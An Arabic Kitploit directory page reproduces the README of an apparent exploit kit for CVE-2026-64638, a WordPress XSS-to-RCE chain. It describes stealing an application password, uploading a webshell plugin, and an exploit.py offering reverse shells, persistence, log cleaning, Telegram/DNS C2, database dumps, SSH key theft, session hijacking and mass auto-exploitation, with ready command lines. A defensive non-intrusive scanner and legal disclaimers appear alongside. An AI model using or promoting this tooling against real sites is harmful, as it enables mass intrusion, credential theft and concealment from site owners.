Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - مجموعة تقييم أمان ووردبريس (CVSS 8.9) | عدة اختبار الاختراق لووردبريس 4.7.0-7.0.2. تتضمن تقييم الثغرات الأمنية ووحدات التحليل المتقدمة. 🐍 فحص آمن واستغلال، وضعان. مجموعة أدوات متقدمة للفريق الأزرق والأحمر الأفضل لعام 2026-64638، للاستخدام المصرح به فقط. ابقَ قانونيًا <3zd | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
تصعيد الامتيازاتماسحات الثغرات الأمنيةتحليل الذاكرة الجنائيآليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

🛡️ CVE-2026-64638 - مجموعة تقييم أمان ووردبريس (CVSS 8.9) | عدة اختبار الاختراق لووردبريس 4.7.0-7.0.2. تتضمن تقييم الثغرات الأمنية ووحدات التحليل المتقدمة. 🐍 فحص آمن واستغلال، وضعان. مجموعة أدوات متقدمة للفريق الأزرق والأحمر الأفضل لعام 2026-64638، للاستخدام المصرح به فقط. ابقَ قانونيًا <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

عرض المستودع
18منذ شهر واحدلم تتم المراجعة بعد
مشاركة

CVE PoC

🌀 CVE‑2026‑64638 – حزمة أمان WordPress XSS2Shell

Python 3.8+ CVSS Author WordPress

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرّح به
توفر هذه المستودعات أدواتًا لـ المتخصصين الأمنيين المصرّح لهم، وفرق الدفاع الأزرق، واختباري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة حول العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑64638 هي ثغرة XSS انعكاسية حرجة قبل المصادقة في إصدارات WordPress الأساسية 4.7.0 حتى 7.0.2، وتسمح للمهاجم بتصعيد هجوم XSS إلى تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE) عبر ميزة كلمة مرور التطبيق (Application Password).

كيف تعمل

  1. فارق المحلِّل (Parser Differential) – تقوم دالة strip_tags() في PHP ودالة wp_kses_post() في WordPress بتحليل وسوم HTML بشكل مختلف، مما يسمح بمرور مدخلات خبيثة عبر عمليات التعقيم.
  2. XSS انعكاسية – يقوم المهاجم بحقن حمولة مصممة خصيصًا في نموذج تسجيل الدخول (wp-login.php). عند فشل تسجيل الدخول، تنعكس الحمولة وتُنفَّذ في متصفح الضحية.
  3. إساءة استخدام كلمة مرور التطبيق – يقوم JavaScript المحقون تلقائيًا بإنشاء كلمة مرور تطبيق عبر REST API في WordPress، ويُرسلها إلى المهاجم.
  4. رفع إضافة (RCE) – باستخدام كلمة مرور التطبيق التي تم التقاطها، يوثّق المهاجم دخوله إلى لوحة الإدارة ويرفع إضافة خبيثة تحتوي على ويب شيل (webshell).
  5. اختراق كامل للنظام – يوفر الويب شيل تنفيذ أوامر النظام، مما يسمح بقذائف عكسية، وثباتية (persistence)، وحركة جانبية، وسيطرة كاملة على الخادم.

الإصدارات المتأثرة

  • WordPress 4.7.0 – 7.0.2 – ثغرة قابلة للاستغلال
  • WordPress 7.0.3 والإصدارات الأحدث – تم إصلاحها
  • تم توفير التحديثات الأمنية لجميع الفروع المدعومة

التصحيح

  • الترقية إلى WordPress 7.0.3 أو إصدار أحدث.
  • إذا لم تكن الترقية ممكنة، عطّل ميزة كلمة مرور التطبيق كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات استغلال كاملة مع قذيفة عكسية، وثباتية، وC2، وتصعيد صلاحيات، وأدلة جنائية للذاكرة، وتفريغ قاعدة البيانات، واستخراج مفاتيح SSH، وفحص جماعي.فرق الاختراق / مختبرو الاختراق المصرح لهم

📊 مقارنة الميزات


🎯 ملخص حالات الاستخدام


⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 المعاملات

معاملات exploit.py

معاملات safecheck.py


💥 السيناريوهات


📊 أوامر القذيفة التفاعلية


🧪 استخدام نقاط النهاية وواجهة API

نقطة النهايةالغرض
/wp-login.phpصفحة تسجيل الدخول – نقطة حقن XSS
/wp-admin/authorize-application.php

🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • التزم دائمًا بقوانين ولوائح بلدك.

هذا البرنامج مقدم لأغراض تعليمية واختبار أمني مصرح به فقط.

الامتثال القانوني

تنزيل الأداة
safecheck.py
فاحص ثغرات غير تدخلي يكتشف انعكاس XSS ويقيّم الوضع الأمني دون تنفيذ أي حمولة خبيثة. يولّد تقارير مفصلة.
فرق الدفاع الأزرق / مدققو الأمن
الميزةexploit.pysafecheck.py
اكتشاف الثغرات✅✅
اكتشاف إصدار WordPress✅✅
اكتشاف انعكاس XSS✅✅
التقاط كلمة مرور التطبيق✅❌
رفع إضافة (RCE)✅❌
قذيفة عكسية✅❌
اتصال C2 (HTTP/DNS/Telegram)✅❌
تصعيد الصلاحيات✅❌
أدلة جنائية للذاكرة✅❌
تفريغ قاعدة البيانات✅❌
استخراج مفاتيح SSH✅❌
طرق الثباتية✅❌
تدقيق ترويسات الأمان❌✅
فحص كشف ملفات الإعدادات❌✅
فحص قوائم الدلائل❌✅
فحص كشف phpinfo❌✅
الفحص الجماعي✅✅
دعم البروكسي✅✅
دعم Tor✅✅
نفق Ngrok✅❌
قذيفة تفاعلية✅❌
وضع غير تدخلي (آمن)❌✅
إخراج JSON / تقرير✅✅
السيناريوالأداة الموصى بها
فريق أزرق – التحقق مما إذا كان تثبيت WordPress لديك معرضًا للخطرsafecheck.py
تدقيق أمني – تقييم ثغرات غير تدخليsafecheck.py
فريق أحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
مكافآت الثغرات (Bug Bounty) – اختبار مسؤول للكشف المسؤولsafecheck.py
فحص جماعي – التحقق من أهداف متعددة بحثًا عن الثغرةexploit.py أو safecheck.py
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafecheck.py
ما بعد الاستغلال المتقدم – ثباتية، C2، أدلة جنائيةexploit.py
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ WordPress (مثل https://wordpress-site.com)
-l, --listملف يحتوي على قائمة الأهداف (هدف واحد في كل سطر) للفحص الجماعي
--lhostعنوان IP المحلي لاستقبال اتصالات القذيفة العكسية
--lportالمنفذ المحلي للقذيفة العكسية (الافتراضي: 4444)
--proxyبروكسي HTTP/HTTPS (مثل http://127.0.0.1:8080)
--timeoutمهلة الطلب بالثواني (الافتراضي: 10)
--retryعدد مرات إعادة المحاولة (الافتراضي: 3)
--threadsعدد الخيوط للفحص الجماعي (الافتراضي: 5)
--exploitاستغلال تلقائي للأهداف المعرضة للخطر أثناء الفحص الجماعي
--ngrok-tokenرمز مصادقة Ngrok للنفق الخارجي
--payload-typeنوع حمولة XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackتمكين اختطاف الجلسة (سرقة ملفات تعريف الارتباط الخاصة بالمدير)
--dump-dbتفريغ قاعدة بيانات WordPress (يتطلب pymysql)
--extract-sshاستخراج مفاتيح SSH من النظام المستهدف
--torتوجيه الحركة عبر Tor (socks5h://127.0.0.1:9050)
--stealthتمكين وضع التخفي (ترويسات مزيفة، تأخير الطلبات)
--no-cleanupتخطي تنظيف السجلات بعد الاستغلال
--ssl-verifyالتحقق من شهادات SSL
--c2-typeنوع C2: http, dns, telegram
--c2-serverعنوان URL لخادم C2 أو رمز بوت Telegram
--auto-priv-escتصعيد صلاحيات تلقائي بعد الحصول على القذيفة
--memory-forensicsتمكين وحدة الأدلة الجنائية للذاكرة
-v, --verboseإخراج مفصّل
-q, --quietوضع هادئ (حد أدنى من الإخراج)
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ WordPress (مثل https://wordpress-site.com)
-l, --listملف يحتوي على قائمة الأهداف (هدف واحد في كل سطر) للفحص الجماعي
--timeoutمهلة الطلب بالثواني (الافتراضي: 10)
--retryعدد مرات إعادة المحاولة (الافتراضي: 3)
--threadsعدد الخيوط للفحص الجماعي (الافتراضي: 5)
--proxyبروكسي HTTP/HTTPS (مثل http://127.0.0.1:8080)
--torتوجيه الحركة عبر Tor (socks5h://127.0.0.1:9050)
--ssl-verifyالتحقق من شهادات SSL
--outputملف تقرير JSON للإخراج
-v, --verboseإخراج مفصّل
-q, --quietوضع هادئ (حد أدنى من الإخراج)
#السيناريوالأمر
1فحص سريع للثغرةpython safecheck.py -t https://wordpress-site.com
2فحص مفصّل مع تقريرpython safecheck.py -t https://wordpress-site.com --output report.json -v
3استغلال كامل مع قذيفة عكسيةpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4استخدام حمولة XSS مخصصةpython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5اختطاف الجلسة (سرقة ملفات تعريف الارتباط الخاصة بالمدير)python exploit.py -t https://wordpress-site.com --session-hijack
6تفريغ قاعدة بيانات WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7استخراج مفاتيح SSHpython exploit.py -t https://wordpress-site.com --extract-ssh
8استخدام Tor لإخفاء الهويةpython exploit.py -t https://wordpress-site.com --tor --stealth
9اتصال C2 عبر Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10فحص جماعي من ملفpython exploit.py -l targets.txt --threads 10 --exploit
11أدلة جنائية للذاكرة بعد القذيفةpython exploit.py -t https://wordpress-site.com --memory-forensics
12تصعيد صلاحيات تلقائيpython exploit.py -t https://wordpress-site.com --auto-priv-esc
13قذيفة تفاعليةpython exploit.py -t https://wordpress-site.com -i
14نفق Ngrokpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
الأمرالوصف
reverseبدء مستمع القذيفة العكسية
persistتطبيق طرق الثباتية (cron, systemd, rc.local, SSH, WP)
cleanتنظيف سجلات النظام والسجل التاريخي
dumpdbتفريغ قاعدة بيانات WordPress
sshاستخراج مفاتيح SSH
privتصعيد صلاحيات تلقائي
memتشغيل الأدلة الجنائية للذاكرة
c2عرض حالة C2
c2taskالتحقق من مهام C2
exitالخروج من القذيفة التفاعلية
توليد كلمة مرور التطبيق
/wp-admin/update.php?action=upload-pluginرفع الإضافة (RCE)
/wp-content/plugins/{slug}/{slug}.phpتنفيذ الويب شيل
البلدالقانون ذو الصلة
الولايات المتحدةقانون الاحتيال وإساءة استخدام الحاسوب (CFAA) – 18 U.S.C. § 1030
المملكة المتحدةقانون إساءة استخدام الحاسوب 1990
تركياTCK 243 (الوصول غير المصرح به)، TCK 244 (التدخل في النظام)
ألمانياStGB § 202a (التجسس على البيانات)، § 202b (اعتراض البيانات)
فرنساقانون Godfrain – المادة 323-1
أسترالياقانون الجرائم الإلكترونية 2001
كنداالقانون الجنائي – القسم 342.1
الهندقانون تكنولوجيا المعلومات 2000 – القسمان 43 و66
اليابانقانون حظر الوصول غير المصرح به إلى الحاسوب